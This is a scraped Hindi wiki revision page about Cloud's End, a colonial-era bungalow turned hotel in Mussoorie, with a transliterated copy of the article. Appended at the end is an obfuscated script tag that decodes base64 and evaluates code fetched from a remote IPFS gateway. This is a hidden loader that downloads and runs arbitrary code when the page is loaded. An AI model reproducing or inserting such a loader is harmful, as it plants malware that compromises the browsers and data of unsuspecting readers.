Difference between revisions of "क्लाउड एंड"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Sunset-at-Clouds-End-Mussoorie.jpg|250px|thumb|क्लाउड एंड, [[मसूरी]] में सूर्यास्त का एक दृश्य]]
 
 
*क्लाउड एंड [[उत्तराखंड]] की प्रकृति की गोद में बसे [[मसूरी]] के मुख्य [[मसूरी पर्यटन|पर्यटन]] स्थल में से है।     
 
*क्लाउड एंड [[उत्तराखंड]] की प्रकृति की गोद में बसे [[मसूरी]] के मुख्य [[मसूरी पर्यटन|पर्यटन]] स्थल में से है।     
 
*क्लाउड्स एंड होटल मसूरी हिल के एकदम पश्चिम में, लाइब्रेरी से 8 कि.मी. दूर पर स्थित है।
 
*क्लाउड्स एंड होटल मसूरी हिल के एकदम पश्चिम में, लाइब्रेरी से 8 कि.मी. दूर पर स्थित है।
Line 8: Line 7:
 
*क्लाउड एंड होटल घने जंगलों से घिरा हुआ है और यहाँ पेड़-पौधों की विविध किस्में हैं।
 
*क्लाउड एंड होटल घने जंगलों से घिरा हुआ है और यहाँ पेड़-पौधों की विविध किस्में हैं।
 
*क्लाउड एंड से [[हिमालय]] की पहाडियों और [[यमुना नदी]] को भो देखा जा सकता है।  
 
*क्लाउड एंड से [[हिमालय]] की पहाडियों और [[यमुना नदी]] को भो देखा जा सकता है।  
 
+
==वीथिका==
[[चित्र:Clouds-End-Mussoorie-Resort.jpg|thumb|रिसोर्ट, क्लाउड एंड, [[मसूरी]]]]  
+
<gallery>
 
+
चित्र:Clouds-End-Mussoorie-Resort.jpg|रिसोर्ट, क्लाउड एंड, [[मसूरी]]]
 +
चित्र:Sunset-at-Clouds-End-Mussoorie.jpg|क्लाउड एंड, [[मसूरी]] में सूर्यास्त का एक दृश्य
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उत्तराखंड के पर्यटन स्थल}}
 
{{उत्तराखंड के पर्यटन स्थल}}

Revision as of 10:24, 12 August 2011

  • klaud eand uttarakhand ki prakriti ki god mean base masoori ke mukhy paryatan sthal mean se hai.
  • klauds eand hotal masoori hil ke ekadam pashchim mean, laibreri se 8 ki.mi. door par sthit hai.
  • klaud eand bangala 1838 mean ek british mejar ne banavaya tha.
  • klaud eand masoori mean bane pahale char bhavanoan mean se ek hai.
  • videshi paryatakoan aur nav vivahit danpattiyoan ke lie yah sabase upayukt hotal hai.
  • klaud eand ko ab bangale ko hotal mean badal diya ja chuka hai.
  • klaud eand hotal ghane jangaloan se ghira hua hai aur yahaan pe d-paudhoan ki vividh kismean haian.
  • klaud eand se himalay ki pahadiyoan aur yamuna nadi ko bho dekha ja sakata hai.

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>